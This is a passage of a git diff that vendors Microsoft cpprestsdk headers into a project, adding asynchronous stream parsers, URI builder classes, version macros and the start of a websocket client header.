+ }); + }; + + auto update = [=](int_type ch) mutable { + if (ch == traits::eof()) return false; + if (ch == '\n') return false; + if (ch == '\r') + { + _locals->saw_CR = true; + return true; + } + + _locals->outbuf[_locals->write_pos] = static_cast(ch); + _locals->write_pos += 1; + + if (_locals->is_full()) + { + // Flushing synchronously because performance is terrible if we + // schedule an empty task. This isn't on a user's thread. + flush().wait(); + } + + return true; + }; + + auto update_after_cr = [=](int_type ch) mutable -> pplx::task { + if (ch == traits::eof()) return pplx::task_from_result(false); + if (ch == '\n') + { + return buffer.bumpc().then([](int_type) { return false; }); + } + return pplx::task_from_result(false); + }; + + auto loop = pplx::details::_do_while([=]() mutable -> pplx::task { + while (buffer.in_avail() > 0) + { + int_type ch; + + if (_locals->saw_CR) + { + ch = buffer.sgetc(); + if (ch == '\n') buffer.sbumpc(); + return pplx::task_from_result(false); + } + + ch = buffer.sbumpc(); + + if (ch == req_async) break; + + if (!update(ch)) + { + return pplx::task_from_result(false); + } + } + + if (_locals->saw_CR) + { + return buffer.getc().then(update_after_cr); + } + return buffer.bumpc().then(update); + }); + + return loop.then([=](bool) mutable { return flush().then([=] { return _locals->total; }); }); + } + + /// + /// Read until reaching the end of the stream. + /// + /// An asynchronous stream buffer supporting write operations. + /// The number of characters read. + pplx::task read_to_end(streams::streambuf target) const + { + pplx::task result; + if (!_verify_and_return_task("stream not set up for output of data", result)) return result; + if (!target.can_write()) + return pplx::task_from_exception( + std::make_exception_ptr(std::runtime_error("source buffer not set up for input of data"))); + + auto l_buffer = helper()->m_buffer; + auto l_buf_size = this->buf_size; + std::shared_ptr<_read_helper> l_locals = std::make_shared<_read_helper>(); + + auto copy_to_target = [l_locals, target, l_buffer, l_buf_size]() mutable -> pplx::task { + // We need to capture these, because the object itself may go away + // before we're done processing the data. + // auto locs = _locals; + // auto trg = target; + + return l_buffer.getn(l_locals->outbuf, l_buf_size).then([=](size_t rd) mutable -> pplx::task { + if (rd == 0) return pplx::task_from_result(false); + + // Must be nested to capture rd + return target.putn_nocopy(l_locals->outbuf, rd) + .then([target, l_locals, rd](size_t wr) mutable -> pplx::task { + l_locals->total += wr; + + if (rd != wr) + // Number of bytes written is less than number of bytes received. + throw std::runtime_error("failed to write all bytes"); + + return target.sync().then([]() { return true; }); + }); + }); + }; + + auto loop = pplx::details::_do_while(copy_to_target); + + return loop.then([=](bool) mutable -> size_t { return l_locals->total; }); + } + + /// + /// Seeks to the specified write position. + /// + /// An offset relative to the beginning of the stream. + /// The new position in the stream. + pos_type seek(pos_type pos) const + { + _verify_and_throw(details::_in_stream_msg); + return helper()->m_buffer.seekpos(pos, std::ios_base::in); + } + + /// + /// Seeks to the specified write position. + /// + /// An offset relative to the beginning, current write position, or the end of the stream. + /// The starting point (beginning, current, end) for the seek. + /// The new position in the stream. + pos_type seek(off_type off, std::ios_base::seekdir way) const + { + _verify_and_throw(details::_in_stream_msg); + return helper()->m_buffer.seekoff(off, way, std::ios_base::in); + } + + /// + /// Get the current write position, i.e. the offset from the beginning of the stream. + /// + /// The current write position. + pos_type tell() const + { + _verify_and_throw(details::_in_stream_msg); + return helper()->m_buffer.getpos(std::ios_base::in); + } + + /// + /// can_seek is used to determine whether the stream supports seeking. + /// + /// true if the stream supports seeking, false otherwise. + bool can_seek() const { return is_valid() && m_helper->m_buffer.can_seek(); } + + /// + /// Test whether the stream has been initialized with a valid stream buffer. + /// + bool is_valid() const { return (m_helper != nullptr) && ((bool)m_helper->m_buffer); } + + /// + /// Test whether the stream has been initialized or not. + /// + operator bool() const { return is_valid(); } + + /// + /// Test whether the stream is open for writing. + /// + /// true if the stream is open for writing, false otherwise. + bool is_open() const { return is_valid() && m_helper->m_buffer.can_read(); } + + /// + /// Get the underlying stream buffer. + /// + concurrency::streams::streambuf streambuf() const { return helper()->m_buffer; } + + /// + /// Read a value of type T from the stream. + /// + /// + /// Supports the C++ primitive types. Can be expanded to additional types + /// by adding template specializations for type_parser. + /// + /// + /// The data type of the element to be read from the stream. + /// + /// A task that holds the element read from the stream. + template + pplx::task extract() const + { + pplx::task result; + if (!_verify_and_return_task(details::_in_stream_msg, result)) return result; + return type_parser::parse(helper()->m_buffer); + } + +private: + template + bool _verify_and_return_task(const char* msg, pplx::task& tsk) const + { + auto buffer = helper()->m_buffer; + if (!(buffer.exception() == nullptr)) + { + tsk = pplx::task_from_exception(buffer.exception()); + return false; + } + if (!buffer.can_read()) + { + tsk = pplx::task_from_exception(std::make_exception_ptr(std::runtime_error(msg))); + return false; + } + return true; + } + + void _verify_and_throw(const char* msg) const + { + auto buffer = helper()->m_buffer; + if (!(buffer.exception() == nullptr)) std::rethrow_exception(buffer.exception()); + if (!buffer.can_read()) throw std::runtime_error(msg); + } + + std::shared_ptr> helper() const + { + if (!m_helper) throw std::logic_error("uninitialized stream object"); + return m_helper; + } + + static const size_t buf_size = 16 * 1024; + + struct _read_helper + { + size_t total; + CharType outbuf[buf_size]; + size_t write_pos; + bool saw_CR; + + bool is_full() const { return write_pos == buf_size; } + + _read_helper() : total(0), write_pos(0), saw_CR(false) {} + }; + + std::shared_ptr> m_helper; +}; + +typedef basic_ostream ostream; +typedef basic_istream istream; + +typedef basic_ostream wostream; +typedef basic_istream wistream; + +template +pplx::task _type_parser_base::_skip_whitespace(streams::streambuf buffer) +{ + int_type req_async = traits::requires_async(); + + auto update = [=](int_type ch) mutable { + if (isspace(ch)) + { + if (buffer.sbumpc() == req_async) + { + // Synchronously because performance is terrible if we + // schedule an empty task. This isn't on a user's thread. + buffer.nextc().wait(); + } + return true; + } + + return false; + }; + + auto loop = pplx::details::_do_while([=]() mutable -> pplx::task { + while (buffer.in_avail() > 0) + { + int_type ch = buffer.sgetc(); + + if (ch == req_async) break; + + if (!update(ch)) + { + return pplx::task_from_result(false); + } + } + return buffer.getc().then(update); + }); + + return loop.then([=](pplx::task op) { op.wait(); }); +} + +template +template +pplx::task _type_parser_base::_parse_input(concurrency::streams::streambuf buffer, + AcceptFunctor accept_character, + ExtractFunctor extract) +{ + std::shared_ptr state = std::make_shared(); + + auto update = [=](pplx::task op) -> pplx::task { + int_type ch = op.get(); + if (ch == traits::eof()) return pplx::task_from_result(false); + bool accptd = accept_character(state, ch); + if (!accptd) return pplx::task_from_result(false); + // We peeked earlier, so now we must advance the position. + concurrency::streams::streambuf buf = buffer; + return buf.bumpc().then([](int_type) { return true; }); + }; + + auto peek_char = [=]() -> pplx::task { + concurrency::streams::streambuf buf = buffer; + + // If task results are immediately available, there's little need to use ".then()," + // so optimize for prompt values. + + auto get_op = buf.getc(); + while (get_op.is_done()) + { + auto condition = update(get_op); + if (!condition.is_done() || !condition.get()) return condition; + + get_op = buf.getc(); + } + + return get_op.then(update); + }; + + auto finish = [=](pplx::task op) -> pplx::task { + op.wait(); + pplx::task result = extract(state); + return result; + }; + + return _skip_whitespace(buffer).then([=](pplx::task op) -> pplx::task { + op.wait(); + return pplx::details::_do_while(peek_char).then(finish); + }); +} + +template +class type_parser> : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::template _parse_input, std::string>( + buffer, _accept_char, _extract_result); + } + +private: + static bool _accept_char(std::shared_ptr> state, int_type ch) + { + if (ch == traits::eof() || isspace(ch)) return false; + state->push_back(CharType(ch)); + return true; + } + static pplx::task> _extract_result(std::shared_ptr> state) + { + return pplx::task_from_result(*state); + } +}; + +template +class type_parser : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::template _parse_input<_int64_state, int64_t>(buffer, _accept_char, _extract_result); + } + +private: + struct _int64_state + { + _int64_state() : result(0), correct(false), minus(0) {} + + int64_t result; + bool correct; + char minus; // 0 -- no sign, 1 -- plus, 2 -- minus + }; + + static bool _accept_char(std::shared_ptr<_int64_state> state, int_type ch) + { + if (ch == traits::eof()) return false; + if (state->minus == 0) + { + // OK to find a sign. + if (!::isdigit(ch) && ch != int_type('+') && ch != int_type('-')) return false; + } + else + { + if (!::isdigit(ch)) return false; + } + + // At least one digit was found. + state->correct = true; + + if (ch == int_type('+')) + { + state->minus = 1; + } + else if (ch == int_type('-')) + { + state->minus = 2; + } + else + { + if (state->minus == 0) state->minus = 1; + + // Shift the existing value by 10, then add the new value. + bool positive = state->result >= 0; + + state->result *= 10; + state->result += int64_t(ch - int_type('0')); + + if ((state->result >= 0) != positive) + { + state->correct = false; + return false; + } + } + return true; + } + + static pplx::task _extract_result(std::shared_ptr<_int64_state> state) + { + if (!state->correct) throw std::range_error("integer value is too large to fit in 64 bits"); + + int64_t result = (state->minus == 2) ? -state->result : state->result; + return pplx::task_from_result(result); + } +}; + +template +struct _double_state +{ + _double_state() + : result(0) + , minus(0) + , after_comma(0) + , exponent(false) + , exponent_number(0) + , exponent_minus(0) + , complete(false) + , p_exception_string() + { + } + + FloatingPoint result; + char minus; // 0 -- no sign, 1 -- plus, 2 -- minus + int after_comma; + bool exponent; + int exponent_number; + char exponent_minus; // 0 -- no sign, 1 -- plus, 2 -- minus + bool complete; + std::string p_exception_string; +}; + +template +static std::string create_exception_message(int_type ch, bool exponent) +{ + std::ostringstream os; + os << "Invalid character '" << char(ch) << "'" << (exponent ? " in exponent" : ""); + return os.str(); +} + +template +static bool _accept_char(std::shared_ptr<_double_state> state, int_type ch) +{ + if (state->minus == 0) + { + if (!::isdigit(ch) && ch != int_type('.') && ch != int_type('+') && ch != int_type('-')) + { + if (!state->complete) + state->p_exception_string = create_exception_message(ch, false); + return false; + } + } + else + { + if (!state->exponent && !::isdigit(ch) && ch != int_type('.') && ch != int_type('E') && ch != int_type('e')) + { + if (!state->complete) + state->p_exception_string = create_exception_message(ch, false); + return false; + } + + if (state->exponent && !::isdigit(ch) && ch != int_type('+') && ch != int_type('-')) + { + if (!state->complete) + state->p_exception_string = create_exception_message(ch, true); + return false; + } + } + + switch (ch) + { + case int_type('+'): + state->complete = false; + if (state->exponent) + { + if (state->exponent_minus != 0) + { + state->p_exception_string = "The exponent sign already set"; + return false; + } + state->exponent_minus = 1; + } + else + { + state->minus = 1; + } + break; + case int_type('-'): + state->complete = false; + if (state->exponent) + { + if (state->exponent_minus != 0) + { + state->p_exception_string = "The exponent sign already set"; + return false; + } + + state->exponent_minus = 2; + } + else + { + state->minus = 2; + } + break; + case int_type('.'): + state->complete = false; + if (state->after_comma > 0) return false; + + state->after_comma = 1; + break; + case int_type('E'): + case int_type('e'): + state->complete = false; + if (state->exponent) return false; + state->exponent_number = 0; + state->exponent = true; + break; + default: + state->complete = true; + if (!state->exponent) + { + if (state->minus == 0) state->minus = 1; + + state->result *= 10; + state->result += int64_t(ch - int_type('0')); + + if (state->after_comma > 0) state->after_comma++; + } + else + { + if (state->exponent_minus == 0) state->exponent_minus = 1; + state->exponent_number *= 10; + state->exponent_number += int64_t(ch - int_type('0')); + } + } + return true; +} + +template +static pplx::task _extract_result(std::shared_ptr<_double_state> state) +{ + if (state->p_exception_string.length() > 0) throw std::runtime_error(state->p_exception_string.c_str()); + + if (!state->complete && state->exponent) throw std::runtime_error("Incomplete exponent"); + + FloatingPoint result = static_cast((state->minus == 2) ? -state->result : state->result); + if (state->exponent_minus == 2) state->exponent_number = 0 - state->exponent_number; + + if (state->after_comma > 0) state->exponent_number -= state->after_comma - 1; + + if (state->exponent_number >= 0) + { + result *= pow(FloatingPoint(10.0), state->exponent_number); + +#pragma push_macro("max") +#undef max + + if (result > std::numeric_limits::max() || result < -std::numeric_limits::max()) + throw std::overflow_error("The value is too big"); +#pragma pop_macro("max") + } + else + { + bool is_zero = (result == 0); + + result /= pow(FloatingPoint(10.0), -state->exponent_number); + + if (!is_zero && result > -std::numeric_limits::denorm_min() && + result < std::numeric_limits::denorm_min()) + throw std::underflow_error("The value is too small"); + } + + return pplx::task_from_result(result); +} + +template +class type_parser : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::template _parse_input<_double_state, double>( + buffer, _accept_char, _extract_result); + } + +protected: +}; + +template +class type_parser : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::template _parse_input<_double_state, float>( + buffer, _accept_char, _extract_result); + } + +protected: +}; + +template +class type_parser : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::template _parse_input<_uint64_state, uint64_t>(buffer, _accept_char, _extract_result); + } + +private: + struct _uint64_state + { + _uint64_state() : result(0), correct(false) {} + uint64_t result; + bool correct; + }; + + static bool _accept_char(std::shared_ptr<_uint64_state> state, int_type ch) + { + if (!::isdigit(ch)) return false; + + // At least one digit was found. + state->correct = true; + + // Shift the existing value by 10, then add the new value. + state->result *= 10; + state->result += uint64_t(ch - int_type('0')); + + return true; + } + + static pplx::task _extract_result(std::shared_ptr<_uint64_state> state) + { + if (!state->correct) throw std::range_error("integer value is too large to fit in 64 bits"); + return pplx::task_from_result(state->result); + } +}; + +template +class type_parser : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::template _parse_input<_bool_state, bool>(buffer, _accept_char, _extract_result); + } + +private: + struct _bool_state + { + _bool_state() : state(0) {} + // { 0 -- not started, 1 -- 't', 2 -- 'tr', 3 -- 'tru', 4 -- 'f', 5 -- 'fa', 6 -- 'fal', 7 -- 'fals', 8 -- + // 'true', 9 -- 'false' } + short state; + }; + + static bool _accept_char(std::shared_ptr<_bool_state> state, int_type ch) + { + switch (state->state) + { + case 0: + if (ch == int_type('t')) + state->state = 1; + else if (ch == int_type('f')) + state->state = 4; + else if (ch == int_type('1')) + state->state = 8; + else if (ch == int_type('0')) + state->state = 9; + else + return false; + break; + case 1: + if (ch == int_type('r')) + state->state = 2; + else + return false; + break; + case 2: + if (ch == int_type('u')) + state->state = 3; + else + return false; + break; + case 3: + if (ch == int_type('e')) + state->state = 8; + else + return false; + break; + case 4: + if (ch == int_type('a')) + state->state = 5; + else + return false; + break; + case 5: + if (ch == int_type('l')) + state->state = 6; + else + return false; + break; + case 6: + if (ch == int_type('s')) + state->state = 7; + else + return false; + break; + case 7: + if (ch == int_type('e')) + state->state = 9; + else + return false; + break; + case 8: + case 9: return false; + } + return true; + } + static pplx::task _extract_result(std::shared_ptr<_bool_state> state) + { + bool correct = (state->state == 8 || state->state == 9); + if (!correct) + { + std::runtime_error exc("cannot parse as Boolean value"); + throw exc; + } + return pplx::task_from_result(state->state == 8); + } +}; + +template +class type_parser : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::_skip_whitespace(buffer).then([=](pplx::task op) -> pplx::task { + op.wait(); + return type_parser::_get_char(buffer); + }); + } + +private: + static pplx::task _get_char(streams::streambuf buffer) + { + concurrency::streams::streambuf buf = buffer; + return buf.bumpc().then([=](pplx::task op) -> signed char { + int_type val = op.get(); + if (val == traits::eof()) throw std::runtime_error("reached end-of-stream while constructing a value"); + return static_cast(val); + }); + } +}; + +template +class type_parser : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::_skip_whitespace(buffer).then([=](pplx::task op) -> pplx::task { + op.wait(); + return type_parser::_get_char(buffer); + }); + } + +private: + static pplx::task _get_char(streams::streambuf buffer) + { + concurrency::streams::streambuf buf = buffer; + return buf.bumpc().then([=](pplx::task op) -> unsigned char { + int_type val = op.get(); + if (val == traits::eof()) throw std::runtime_error("reached end-of-stream while constructing a value"); + return static_cast(val); + }); + } +}; + +template +class type_parser : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::_skip_whitespace(buffer).then([=](pplx::task op) -> pplx::task { + op.wait(); + return _get_char(buffer); + }); + } + +private: + static pplx::task _get_char(streams::streambuf buffer) + { + concurrency::streams::streambuf buf = buffer; + return buf.bumpc().then([=](pplx::task op) -> char { + int_type val = op.get(); + if (val == traits::eof()) throw std::runtime_error("reached end-of-stream while constructing a value"); + return char(val); + }); + } +}; + +#ifdef _WIN32 +template +class type_parser>> + : public _type_parser_base +{ + typedef _type_parser_base base; + +public: + typedef typename base::traits traits; + typedef typename base::int_type int_type; + + static pplx::task parse(streams::streambuf buffer) + { + return base::template _parse_input, std::basic_string>( + buffer, _accept_char, _extract_result); + } + +private: + static bool _accept_char(const std::shared_ptr>& state, int_type ch) + { + if (ch == concurrency::streams::char_traits::eof() || isspace(ch)) return false; + state->push_back(char(ch)); + return true; + } + static pplx::task> _extract_result(std::shared_ptr> state) + { + return pplx::task_from_result(utility::conversions::utf8_to_utf16(*state)); + } +}; +#endif //_WIN32 + +} // namespace streams +} // namespace Concurrency + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/uri.h b/Src/Common/CppRestSdk/include/cpprest/uri.h new file mode 100644 index 0000000..6dc0432 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/uri.h @@ -0,0 +1,21 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Protocol independent support for URIs. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_URI_H +#define CASA_URI_H + +#include "Common/CppRestSdk/include/cpprest/base_uri.h" +#include "Common/CppRestSdk/include/cpprest/uri_builder.h" + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/uri_builder.h b/Src/Common/CppRestSdk/include/cpprest/uri_builder.h new file mode 100644 index 0000000..2fc4bf9 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/uri_builder.h @@ -0,0 +1,295 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Builder style class for creating URIs. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#include "Common/CppRestSdk/include/cpprest/base_uri.h" +#include + +namespace web +{ +/// +/// Builder for constructing URIs incrementally. +/// +class uri_builder +{ +public: + /// + /// Creates a builder with an initially empty URI. + /// + uri_builder() = default; + + /// + /// Creates a builder with a existing URI object. + /// + /// Encoded string containing the URI. + uri_builder(const uri& uri_str) : m_uri(uri_str.m_components) {} + + /// + /// Get the scheme component of the URI as an encoded string. + /// + /// The URI scheme as a string. + const utility::string_t& scheme() const { return m_uri.m_scheme; } + + /// + /// Get the user information component of the URI as an encoded string. + /// + /// The URI user information as a string. + const utility::string_t& user_info() const { return m_uri.m_user_info; } + + /// + /// Get the host component of the URI as an encoded string. + /// + /// The URI host as a string. + const utility::string_t& host() const { return m_uri.m_host; } + + /// + /// Get the port component of the URI. Returns -1 if no port is specified. + /// + /// The URI port as an integer. + int port() const { return m_uri.m_port; } + + /// + /// Get the path component of the URI as an encoded string. + /// + /// The URI path as a string. + const utility::string_t& path() const { return m_uri.m_path; } + + /// + /// Get the query component of the URI as an encoded string. + /// + /// The URI query as a string. + const utility::string_t& query() const { return m_uri.m_query; } + + /// + /// Get the fragment component of the URI as an encoded string. + /// + /// The URI fragment as a string. + const utility::string_t& fragment() const { return m_uri.m_fragment; } + + /// + /// Set the scheme of the URI. + /// + /// Uri scheme. + /// A reference to this uri_builder to support chaining. + uri_builder& set_scheme(const utility::string_t& scheme) + { + m_uri.m_scheme = scheme; + return *this; + } + + /// + /// Set the user info component of the URI. + /// + /// User info as a decoded string. + /// Specify whether to apply URI encoding to the given string. + /// A reference to this uri_builder to support chaining. + uri_builder& set_user_info(const utility::string_t& user_info, bool do_encoding = false) + { + if (do_encoding) + { + m_uri.m_user_info = uri::encode_uri(user_info, uri::components::user_info); + } + else + { + m_uri.m_user_info = user_info; + } + + return *this; + } + + /// + /// Set the host component of the URI. + /// + /// Host as a decoded string. + /// Specify whether to apply URI encoding to the given string. + /// A reference to this uri_builder to support chaining. + uri_builder& set_host(const utility::string_t& host, bool do_encoding = false) + { + if (do_encoding) + { + m_uri.m_host = uri::encode_uri(host, uri::components::host); + } + else + { + m_uri.m_host = host; + } + + return *this; + } + + /// + /// Set the port component of the URI. + /// + /// Port as an integer. + /// A reference to this uri_builder to support chaining. + uri_builder& set_port(int port) + { + m_uri.m_port = port; + return *this; + } + + /// + /// Set the port component of the URI. + /// + /// Port as a string. + /// A reference to this uri_builder to support chaining. + /// When string can't be converted to an integer the port is left unchanged. + _ASYNCRTIMP uri_builder& set_port(const utility::string_t& port); + + /// + /// Set the path component of the URI. + /// + /// Path as a decoded string. + /// Specify whether to apply URI encoding to the given string. + /// A reference to this uri_builder to support chaining. + uri_builder& set_path(const utility::string_t& path, bool do_encoding = false) + { + if (do_encoding) + { + m_uri.m_path = uri::encode_uri(path, uri::components::path); + } + else + { + m_uri.m_path = path; + } + + return *this; + } + + /// + /// Set the query component of the URI. + /// + /// Query as a decoded string. + /// Specify whether apply URI encoding to the given string. + /// A reference to this uri_builder to support chaining. + uri_builder& set_query(const utility::string_t& query, bool do_encoding = false) + { + if (do_encoding) + { + m_uri.m_query = uri::encode_uri(query, uri::components::query); + } + else + { + m_uri.m_query = query; + } + + return *this; + } + + /// + /// Set the fragment component of the URI. + /// + /// Fragment as a decoded string. + /// Specify whether to apply URI encoding to the given string. + /// A reference to this uri_builder to support chaining. + uri_builder& set_fragment(const utility::string_t& fragment, bool do_encoding = false) + { + if (do_encoding) + { + m_uri.m_fragment = uri::encode_uri(fragment, uri::components::fragment); + } + else + { + m_uri.m_fragment = fragment; + } + + return *this; + } + + /// + /// Clears all components of the underlying URI in this uri_builder. + /// + void clear() { m_uri = details::uri_components(); } + + /// + /// Appends another path to the path of this uri_builder. + /// + /// Path to append as a already encoded string. + /// Specify whether to apply URI encoding to the given string. + /// A reference to this uri_builder to support chaining. + _ASYNCRTIMP uri_builder& append_path(const utility::string_t& path, bool do_encoding = false); + + /// + /// Appends the raw contents of the path argument to the path of this uri_builder with no separator de-duplication. + /// + /// + /// The path argument is appended after adding a '/' separator without regards to the contents of path. If an empty + /// string is provided, this function will immediately return without changes to the stored path value. For example: + /// if the current contents are "/abc" and path="/xyz", the result will be "/abc//xyz". + /// + /// Path to append as a already encoded string. + /// Specify whether to apply URI encoding to the given string. + /// A reference to this uri_builder to support chaining. + _ASYNCRTIMP uri_builder& append_path_raw(const utility::string_t& path, bool do_encoding = false); + + /// + /// Appends another query to the query of this uri_builder. + /// + /// Query to append as a decoded string. + /// Specify whether to apply URI encoding to the given string. + /// A reference to this uri_builder to support chaining. + _ASYNCRTIMP uri_builder& append_query(const utility::string_t& query, bool do_encoding = false); + + /// + /// Appends an relative uri (Path, Query and fragment) at the end of the current uri. + /// + /// The relative uri to append. + /// A reference to this uri_builder to support chaining. + _ASYNCRTIMP uri_builder& append(const uri& relative_uri); + + /// + /// Appends another query to the query of this uri_builder, encoding it first. This overload is useful when building + /// a query segment of the form "element=10", where the right hand side of the query is stored as a type other than + /// a string, for instance, an integral type. + /// + /// The name portion of the query string + /// The value portion of the query string + /// A reference to this uri_builder to support chaining. + template + uri_builder& append_query(const utility::string_t& name, const T& value, bool do_encoding = true) + { + if (do_encoding) + append_query_encode_impl(name, utility::conversions::details::print_utf8string(value)); + else + append_query_no_encode_impl(name, utility::conversions::details::print_string(value)); + return *this; + } + + /// + /// Combine and validate the URI components into a encoded string. An exception will be thrown if the URI is + /// invalid. + /// + /// The created URI as a string. + _ASYNCRTIMP utility::string_t to_string() const; + + /// + /// Combine and validate the URI components into a URI class instance. An exception will be thrown if the URI is + /// invalid. + /// + /// The create URI as a URI class instance. + _ASYNCRTIMP uri to_uri() const; + + /// + /// Validate the generated URI from all existing components of this uri_builder. + /// + /// Whether the URI is valid. + _ASYNCRTIMP bool is_valid(); + +private: + _ASYNCRTIMP void append_query_encode_impl(const utility::string_t& name, const utf8string& value); + _ASYNCRTIMP void append_query_no_encode_impl(const utility::string_t& name, const utility::string_t& value); + + details::uri_components m_uri; +}; +} // namespace web diff --git a/Src/Common/CppRestSdk/include/cpprest/version.h b/Src/Common/CppRestSdk/include/cpprest/version.h new file mode 100644 index 0000000..af1a6c7 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/version.h @@ -0,0 +1,10 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + */ +#define CPPREST_VERSION_MINOR 10 +#define CPPREST_VERSION_MAJOR 2 +#define CPPREST_VERSION_REVISION 13 + +#define CPPREST_VERSION (CPPREST_VERSION_MAJOR * 100000 + CPPREST_VERSION_MINOR * 100 + CPPREST_VERSION_REVISION) diff --git a/Src/Common/CppRestSdk/include/cpprest/ws_client.h b/Src/Common/CppRestSdk/include/cpprest/ws_client.h new file mode 100644 index 0000000..4953361 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/ws_client.h @@ -0,0 +1,611 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Websocket client side implementation + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_WS_CLIENT_H +#define CASA_WS_CLIENT_H + +#include "Common/CppRestSdk/include/cpprest/details/basic_types.h" + +#if !defined(CPPREST_EXCLUDE_WEBSOCKETS) + +#include "Common/CppRestSdk/include/cpprest/asyncrt_utils.h" +#include "Common/CppRestSdk/include/cpprest/details/web_utilities.h" +#include "Common/CppRestSdk/include/cpprest/http_headers.h" +#include "Common/CppRestSdk/include/cpprest/uri.h" +#include "Common/CppRestSdk/include/cpprest/ws_msg.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include +#include +#include +#include + +#if !defined(_WIN32) || !defined(__cplusplus_winrt) +#if defined(__clang__) +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wconversion" +#endif +#include "boost/asio/ssl.hpp" +#if defined(__clang__) +#pragma clang diagnostic pop +#endif +#endif + +namespace web +{ +// For backwards compatibility for when in the experimental namespace. +// At next major release this should be deleted. +namespace experimental = web; + +// In the past namespace was accidentally called 'web_sockets'. To avoid breaking code +// alias it. At our next major release this should be deleted. +namespace web_sockets = websockets; + +namespace websockets +{ +/// WebSocket client side library. +namespace client +{ +/// Websocket close status values. +enum class websocket_close_status +{ + normal = 1000, + going_away = 1001, + protocol_error = 1002, + unsupported = 1003, // or data_mismatch + abnormal_close = 1006, + inconsistent_datatype = 1007, + policy_violation = 1008, + too_large = 1009, + negotiate_error = 1010, + server_terminate = 1011, +}; + +/// +/// Websocket client configuration class, used to set the possible configuration options +/// used to create an websocket_client instance. +/// +class websocket_client_config +{ +public: + /// + /// Creates a websocket client configuration with default settings. + /// + websocket_client_config() : m_sni_enabled(true), m_validate_certificates(true) {} + + /// + /// Get the web proxy object + /// + /// A reference to the web proxy object. + const web_proxy& proxy() const { return m_proxy; } + + /// + /// Set the web proxy object + /// + /// The web proxy object. + void set_proxy(const web_proxy& proxy) { m_proxy = proxy; } + + /// + /// Get the client credentials + /// + /// A reference to the client credentials. + const web::credentials& credentials() const { return m_credentials; } + + /// + /// Set the client credentials + /// + /// The client credentials. + void set_credentials(const web::credentials& cred) { m_credentials = cred; } + + /// + /// Disables Server Name Indication (SNI). Default is on. + /// + void disable_sni() { m_sni_enabled = false; } + + /// + /// Determines if Server Name Indication (SNI) is enabled. + /// + /// True if enabled, false otherwise. + bool is_sni_enabled() const { return m_sni_enabled; } + + /// + /// Sets the server host name to use for TLS Server Name Indication (SNI). + /// + /// By default the host name is set to the websocket URI host. + /// The host name to use, as a string. + void set_server_name(const utf8string& name) { m_sni_hostname = name; } + + /// + /// Gets the server host name to use for TLS Server Name Indication (SNI). + /// + /// Host name as a string. + const utf8string& server_name() const { return m_sni_hostname; } + + /// + /// Sets the User Agent to be used for the connection + /// + /// The User Agent to use, as a string. + _ASYNCRTIMP void set_user_agent(const utf8string& user_agent); + + /// + /// Gets the headers of the HTTP request message used in the WebSocket protocol handshake. + /// + /// HTTP headers for the WebSocket protocol handshake. + 